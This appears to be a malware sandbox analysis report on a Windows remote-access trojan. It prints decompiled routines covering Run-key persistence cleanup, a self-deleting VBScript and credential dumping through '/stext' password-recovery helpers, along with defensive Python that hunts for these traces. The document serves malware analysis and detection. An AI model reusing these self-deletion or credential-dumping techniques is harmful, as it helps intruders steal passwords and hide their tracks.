                                          • Part of subcall function 00412DDF: CreateFileW.KERNEL32(73BCF560,80000000,00000003,00000000,00000003,00000080,00000000,00000000,73BCF560,?,00409C9F,00000000), ref: 00412DF9
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040B1AF
                                        • DeleteFileW.KERNEL32(00000000), ref: 0040B1B6
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 0040B1C5
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040B1E1
                                        • DeleteFileW.KERNEL32(00000000), ref: 0040B1E8
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 0040B1F1
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040B20A
                                        • DeleteFileW.KERNEL32(00000000), ref: 0040B211
                                        • Sleep.KERNEL32(000001F4), ref: 0040B22A
                                        • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,00415B14), ref: 0040B243
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,0041B310,?,0041B310,?,0041B310,?,0041B310,00000000,?,?,?,00000000), ref: 0040B28B
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,0041B310,?,0041B310,00000000,?,?,?,00000000), ref: 0040B29B
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,0041B310,?,0041B310,00000000,?,?,?,00000000), ref: 0040B2AB
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,0041B310,?,0041B310,00000000,?,?,?), ref: 0040B2B8
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,0041B310,?,0041B310,00000000), ref: 0040B2C5
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0041B310), ref: 0040B2D2
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040B2DF
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000069), ref: 0040B300
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B309
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B312
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B31B
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B327
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B333
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B33F
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040B2E9
                                          • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                          • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B408
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B411
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B41D
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B426
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B42F
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B43B
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B447
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B450
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B459
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B462
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B46B
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B474
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$D@std@@G@std@@$??1?$basic_string@$D@2@@std@@$G@2@@std@@$V?$basic_string@$Hstd@@$?c_str@?$basic_string@$G@2@@0@V10@0@$??0?$basic_string@$D@2@@0@$D@1@@File$G@1@@V10@V10@@$Delete$SleepV01@@rand$??8std@@CreateModuleNameV01@Y?$basic_string@srandtime
                                        • String ID: /stext "
                                        • API String ID: 1338134179-3856184850
                                        • Opcode ID: 5ffcdff64bcc1c6a9a9668ba802c80dca196d14f5aa7d340fadde5d72a710b36
                                        • Instruction ID: be4b94b66ba9b0bd8820f021ae38252d46d58d745cb1822e142cef95b78b0ffe
                                        • Opcode Fuzzy Hash: 5ffcdff64bcc1c6a9a9668ba802c80dca196d14f5aa7d340fadde5d72a710b36
                                        • Instruction Fuzzy Hash: 4D02EDB2C0050DEBDB05EBE0EC59EDE7B7CAF54345F04806AF516A3091EB745689CBA8
                                        Uniqueness

                                        Uniqueness Score: -1.00%
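
The API sequence listed above (random file name from time/srand/rand, a command line ending in ` /stext "<path>"` built four times in a row, Sleep, CreateFileW to read the output back, DeleteFileW, Sleep again) is the usual way a RAT drives NirSoft-style password-recovery helpers, whose `/stext <file>` switch writes their result to a text file. The following Python is an added hunting example, not code from the sample or from the report: it runs over constructed process-create and file-delete records (event names and paths are assumptions, not telemetry from this analysis) and flags each `/stext` launch, pairing it with a delete of the same output file shortly afterwards and counting bursts from the same image.

```python
"""Hunt for the credential-dump pattern in the listing above: spawn a helper with
/stext "<output file>", Sleep, read the file back, DeleteFileW it, repeat.
Event names and records are constructed for this example, not telemetry from
the report; map them onto your EDR's process-create and file-delete fields."""
import re
from typing import Dict, List, Tuple

# (timestamp_s, event_type, image, detail): detail is the command line for a
# ProcessCreate and the removed path for a FileDelete.
Event = Tuple[float, str, str, str]

TEMP = r"C:\Users\u\AppData\Local\Temp"
SAMPLE_EVENTS: List[Event] = [
    # Two back-to-back dumps from the same image, each output deleted within a second.
    (10.0, "ProcessCreate", TEMP + r"\host.exe", f'"{TEMP}\\host.exe" /stext "{TEMP}\\kqzv.tmp"'),
    (10.2, "FileDelete", TEMP + r"\host.exe", TEMP + r"\kqzv.tmp"),
    (11.0, "ProcessCreate", TEMP + r"\host.exe", f'"{TEMP}\\host.exe" /stext "{TEMP}\\mlop.tmp"'),
    (11.6, "FileDelete", TEMP + r"\host.exe", TEMP + r"\mlop.tmp"),
    # A path component that merely contains "stext": must not match.
    (50.0, "ProcessCreate", r"C:\Windows\System32\cmd.exe", r'cmd /c type "C:\logs\stext_notes.txt"'),
    # Unquoted output path and no delete afterwards: flag it, but at lower severity.
    (60.0, "ProcessCreate", r"C:\Tools\WebBrowserPassView.exe", r"WebBrowserPassView.exe /stext C:\audit\out.txt"),
    (60.5, "FileDelete", r"C:\Tools\WebBrowserPassView.exe", r"C:\audit\other.txt"),
]

# "/stext" as its own switch, followed by a quoted or bare path. Case-insensitive
# because the NirSoft command-line parsers are.
STEXT_RE = re.compile(r'(?i)(?:^|\s)/stext\s+(?:"([^"]+)"|(\S+))')


def find_stext_dumps(events: List[Event], delete_window_s: float = 5.0,
                     burst_window_s: float = 60.0) -> List[Dict[str, object]]:
    """Return one finding per /stext launch, noting whether the output file was
    deleted shortly afterwards and how many launches the same image made in a burst."""
    findings: List[Dict[str, object]] = []
    for i, (ts, etype, image, detail) in enumerate(events):
        if etype != "ProcessCreate":
            continue
        m = STEXT_RE.search(detail)
        if not m:
            continue
        out_path = m.group(1) or m.group(2)
        # The listing reads the dump and then calls DeleteFileW on it: look for a
        # delete of exactly that path within the window after the launch.
        deleted = any(
            e_type == "FileDelete" and e_detail.lower() == out_path.lower()
            and ts <= e_ts <= ts + delete_window_s
            for e_ts, e_type, _, e_detail in events[i + 1:]
        )
        findings.append({"ts": ts, "image": image, "output": out_path,
                         "output_deleted": deleted,
                         "severity": "high" if deleted else "medium"})
    # The listing issues several dumps back to back; count launches per image.
    for f in findings:
        f["burst"] = sum(1 for g in findings
                         if g["image"] == f["image"] and abs(g["ts"] - f["ts"]) <= burst_window_s)
    return findings


if __name__ == "__main__":
    for finding in find_stext_dumps(SAMPLE_EVENTS):
        print(finding)
```

A legitimate administrator running a NirSoft tool leaves the output file in place; the delete-within-seconds pairing and the burst count are what separate the RAT's usage from that.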

                                        C-Code - Quality: 20%
                                        			/* Uninstall routine. It strips the Run-key persistence, resolves the installed
                                        			   binary's path, writes a VBScript to %Temp%\update.vbs that deletes that binary
                                        			   (looping until the delete succeeds), the configured folder and the script itself,
                                        			   then launches the script and exits the process. */
                                        			E004085AC(char _a4) {
                                        				signed int _v5;
                                        				char _v6;
                                        				char _v24;
                                        				char _v40;
                                        				char _v56;
                                        				char _v72;
                                        				char _v88;
                                        				void* _v104;
                                        				void* _v120;
                                        				short _v640;
                                        				void* _t63;
                                        				char* _t65;
                                        				WCHAR* _t68;
                                        				char* _t69;
                                        				char* _t71;
                                        				char* _t74;
                                        				char* _t75;
                                        				char* _t76;
                                        				char* _t77;
                                        				signed int* _t79;
                                        				char* _t80;
                                        				char* _t81;
                                        				signed int _t82;
                                        				short* _t84;
                                        				char* _t85;
                                        				char* _t86;
                                        				WCHAR* _t88;
                                        				char* _t89;
                                        				char* _t90;
                                        				short* _t154;
                                        				void* _t161;
                                        				void* _t162;
                                        				void* _t164;
                                        				void* _t166;
                                        
                                        				_t63 = E0040AC8C();
                                        				if( *0x41b154 != 0x30) {
                                        					_t63 = E00406D41(0x41b900);
                                        				}
                                        				if( *0x41c118 == 1) {
                                        					_t63 = E0041050F(_t63);
                                        				}
                                        				if( *0x41b22a != 0) {
                                        					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                        					_t63 = E00412BEE(_t63);
                                        				}
                                        				/* Persistence cleanup, each call gated by a config flag: helper E0040B9E8 is
                                        				   given the Run key under HKEY_CURRENT_USER (0x80000001), the Run key under
                                        				   HKEY_LOCAL_MACHINE (0x80000002) and HKLM Policies\Explorer\Run. */
                                        				_t94 = L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\";
                                        				if( *0x41ba58 == 1) {
                                        					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                        					_t63 = E0040B9E8(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", _t63);
                                        					_t161 = _t161 + 0xc;
                                        				}
                                        				if( *0x41bc64 == 1) {
                                        					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                        					_t63 = E0040B9E8(0x80000002, _t94, _t63);
                                        					_t161 = _t161 + 0xc;
                                        				}
                                        				if( *0x41ba20 == 1) {
                                        					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                        					_t63 = E0040B9E8(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\", _t63);
                                        					_t161 = _t161 + 0xc;
                                        				}
                                        				/* Resolve the installed binary: read the "exepath" value under HKCU via
                                        				   E0040B692, fall back to this module's own path, delete the HKCU key, then
                                        				   reset the file's attributes (FILE_ATTRIBUTE_NORMAL = 0x80) so the script
                                        				   can remove it; _v5 records whether that reset succeeded. */
                                        				__imp__?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
                                        				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                        				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                        				_t65 = E0040B692(0x80000001,  &_v640, "exepath",  &_v640, 0x208, _t63, _t63);
                                        				_t162 = _t161 + 0x1c;
                                        				if(_t65 == 0) {
                                        					_t65 = GetModuleFileNameW(0,  &_v640, 0x208);
                                        				}
                                        				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                        				RegDeleteKeyA(0x80000001, _t65);
                                        				_v5 = 1;
                                        				_t68 = SetFileAttributesW( &_v640, 0x80);
                                        				if(_t68 == 0) {
                                        					_v5 = _v5 & _t68;
                                        				}
                                        				__imp__??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z(0x41bc68, 0x415800);
                                        				if(_t68 != 0) {
                                        					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                        					SetFileAttributesW(_t68, 0x80);
                                        				}
                                        				/* Script path is %Temp%\update.vbs; its body is built from the literals below. */
                                        				_t69 =  &_v6;
                                        				__imp___wgetenv(L"Temp", _t69, L"\\update.vbs");
                                        				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(_t69);
                                        				L00414146();
                                        				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ( &_v88, _t69);
                                        				_t71 =  &_v6;
                                        				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(L"Set fso = CreateObject(\"Scripting.FileSystemObject\")\n", _t71);
                                        				L0041416A();
                                        				_t164 = _t162 + 0x18;
                                        				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ( &_v40, L"On Error Resume Next\n", _t71);
                                        				/* The while/wend wait loop around DeleteFile is only emitted when the attribute
                                        				   reset succeeded (_v5 != 0); otherwise a single DeleteFile is attempted. */
                                        				if(_v5 != 0) {
                                        					_t88 =  &_v640;
                                        					__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(_t88,  &_v6, L"\")\n");
                                        					_t89 =  &_v72;
                                        					L0041416A();
                                        					_t90 =  &_v24;
                                        					L00414146();
                                        					_t164 = _t164 + 0x18;
                                        					__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t90, _t90, _t89, _t89, L"while fso.FileExists(\"", _t88);
                                        					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        				}
                                        				_t154 = L"\"\n";
                                        				_t74 =  &_v6;
                                        				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(L"fso.DeleteFile \"", _t74,  &_v640, _t154);
                                        				_t75 =  &_v72;
                                        				L00414146();
                                        				_t76 =  &_v56;
                                        				L00414146();
                                        				_t166 = _t164 + 0x18;
                                        				__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t76, _t76, _t75, _t75, _t74);
                                        				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        				if(_v5 != 0) {
                                        					__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z(L"wend\n");
                                        				}
                                        				__imp__??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z(0x41bc68, 0x415800);
                                        				if(_t76 != 0) {
                                        					_t85 =  &_v72;
                                        					L0041416A();
                                        					_t86 =  &_v56;
                                        					L00414146();
                                        					_t166 = _t166 + 0x18;
                                        					__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t86, _t86, _t85, _t85, L"fso.DeleteFolder \"", 0x41bc68, _t154);
                                        					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        				}
                                        				_t77 =  &_v6;
                                        				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(L"\"\"\", 0", _t77, "\n");
                                        				_t79 =  &_v5;
                                        				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(L"CreateObject(\"WScript.Shell\").Run \"cmd /c \"\"", _t79,  &_a4, _t77);
                                        				_t80 =  &_v24;
                                        				L0041414C();
                                        				_t81 =  &_v72;
                                        				L0041414C();
                                        				_t82 =  &_v56;
                                        				L00414146();
                                        				__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t82, _t82, _t81, _t81, _t80, _t80, _t79);
                                        				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        				/* Final line makes the script delete itself. E00412D56 receives the script
                                        				   path, the byte length and the buffer; ShellExecuteW returns a value above 32
                                        				   on success, so exit(0) runs only when the script was actually launched. */
                                        				__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z(L"fso.DeleteFile(Wscript.ScriptFullName)");
                                        				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                        				__imp__?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ();
                                        				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                        				_t84 = E00412D56( &_v40, _t82 << 1, _t82 << 1, _t82, 0);
                                        				if(_t84 != 0) {
                                        					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                        					_t84 = ShellExecuteW(0, L"open", _t84, 0x415800, 0x415800, 0);
                                        					if(_t84 > 0x20) {
                                        						exit(0);
                                        					}
                                        				}
                                        				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        				return _t84;
                                        			}
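
The routine above assembles its VBScript from literal fragments that survive the decompilation (`On Error Resume Next`, `Set fso = CreateObject("Scripting.FileSystemObject")`, `while fso.FileExists("`, `fso.DeleteFile "`, `wend`, `fso.DeleteFolder "`, `CreateObject("WScript.Shell").Run "cmd /c ""`, `fso.DeleteFile(Wscript.ScriptFullName)`). The Python below is an added example, not code from the sample or the report: it reconstructs the script text those fragments produce so an analyst knows what to expect in a recovered `%Temp%\update.vbs`, and scores any `.vbs` against the same markers for triage. The line order is assumed from the concatenation sequence in the listing, the argument passed as `_a4` is unknown and replaced by a placeholder, and all paths are constructed.

```python
"""Reconstruct and triage the self-delete VBScript built by the routine above.
Marker strings are taken verbatim from the decompiled listing; the line order is
an assumption based on the concatenation sequence. Paths here are constructed."""
from typing import Dict, List

# Literal fragments visible in the decompiled function. The exe path, folder and
# command are filled in at runtime (_v640, the string at 0x41bc68 and _a4).
MARKERS: Dict[str, str] = {
    "suppress_errors": "On Error Resume Next",
    "fso_object": 'Set fso = CreateObject("Scripting.FileSystemObject")',
    "wait_loop": "while fso.FileExists(",
    "delete_exe": 'fso.DeleteFile "',
    "delete_dir": 'fso.DeleteFolder "',
    "hidden_cmd": 'CreateObject("WScript.Shell").Run "cmd /c ""',
    "self_delete": "fso.DeleteFile(Wscript.ScriptFullName)",
}


def build_uninstall_vbs(exe_path: str, install_dir: str = "", cmd_arg: str = "",
                        attributes_reset: bool = True) -> str:
    """Return the script text as the listing builds it. The while/wend loop is only
    emitted when SetFileAttributesW succeeded (_v5 != 0), and the DeleteFolder line
    only when the configured folder string is non-empty."""
    lines: List[str] = [MARKERS["suppress_errors"], MARKERS["fso_object"]]
    if attributes_reset:
        lines.append(f'while fso.FileExists("{exe_path}")')
    lines.append(f'fso.DeleteFile "{exe_path}"')
    if attributes_reset:
        lines.append("wend")
    if install_dir:
        lines.append(f'fso.DeleteFolder "{install_dir}"')
    # Doubled quotes are VBScript's escape: the shell receives  cmd /c "<cmd_arg>"
    # and window style 0 keeps the console hidden.
    lines.append(f'CreateObject("WScript.Shell").Run "cmd /c ""{cmd_arg}""", 0')
    lines.append(MARKERS["self_delete"])
    return "\n".join(lines) + "\n"


def triage_vbs(text: str) -> Dict[str, object]:
    """Score an arbitrary .vbs against the markers. A FileExists wait loop that keeps
    deleting a file, plus script self-deletion, is the combination worth escalating."""
    hits = [name for name, needle in MARKERS.items() if needle in text]
    escalate = {"wait_loop", "delete_exe", "self_delete"} <= set(hits)
    return {"hits": hits, "score": len(hits), "escalate": escalate}


def default_script_path(temp_dir: str) -> str:
    """The listing resolves _wgetenv("Temp") and appends \\update.vbs."""
    return temp_dir.rstrip("\\") + "\\update.vbs"


if __name__ == "__main__":
    script = build_uninstall_vbs(r"C:\Users\u\AppData\Roaming\svc\svc.exe",
                                 r"C:\Users\u\AppData\Roaming\svc", "echo done")
    print(default_script_path(r"C:\Users\u\AppData\Local\Temp"))
    print(script)
    print(triage_vbs(script))
```

Because the script deletes itself as its last statement, the file rarely survives on disk; the reconstruction is mainly useful for matching against WScript process-creation command lines, Temp-folder file-create events and memory strings.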


                                        APIs
                                          • Part of subcall function 0040AC8C: TerminateProcess.KERNEL32(00000000,00000000,004085BA), ref: 0040AC9C
                                          • Part of subcall function 0040AC8C: WaitForSingleObject.KERNEL32(000000FF), ref: 0040ACAF
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 004085E9
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000004,0041B310,00000000), ref: 00408613
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000004,0041B310,00000000), ref: 0040862F
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000004,0041B310,00000000), ref: 0040864F
                                        • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000004,0041B310,00000000), ref: 0040866F
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00408678
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(exepath,?,00000208,00000000), ref: 00408698
                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 004086B6
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 004086BE
                                        • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 004086C6
                                        • SetFileAttributesW.KERNEL32(?,00000080), ref: 004086E3
                                        • ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(0041BC68,00415800), ref: 004086F7
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000080), ref: 00408709
                                        • SetFileAttributesW.KERNEL32(00000000), ref: 00408710
                                          • Part of subcall function 00406D41: TerminateThread.KERNEL32(Function_0000528A,00000000,00000004,0041B310,004085CD), ref: 00406D56
                                          • Part of subcall function 00406D41: UnhookWindowsHookEx.USER32(00000000), ref: 00406D5F
                                          • Part of subcall function 00406D41: TerminateThread.KERNEL32(Function_0000526A,00000000), ref: 00406D6F
                                        • _wgetenv.MSVCRT ref: 00408720
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000), ref: 0040872B
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00408736
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408741
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(Set fso = CreateObject("Scripting.FileSystemObject"),?), ref: 00408753
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,On Error Resume Next,00000000), ref: 00408763
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040876E
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,")), ref: 0040878D
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,while fso.FileExists(",00000000), ref: 0040879D
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004087AA
                                        • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004087B6
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004087BF
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004087C8
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004087D1
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(fso.DeleteFile ",?,?,00416354), ref: 004087F0
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004087FB
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00408808
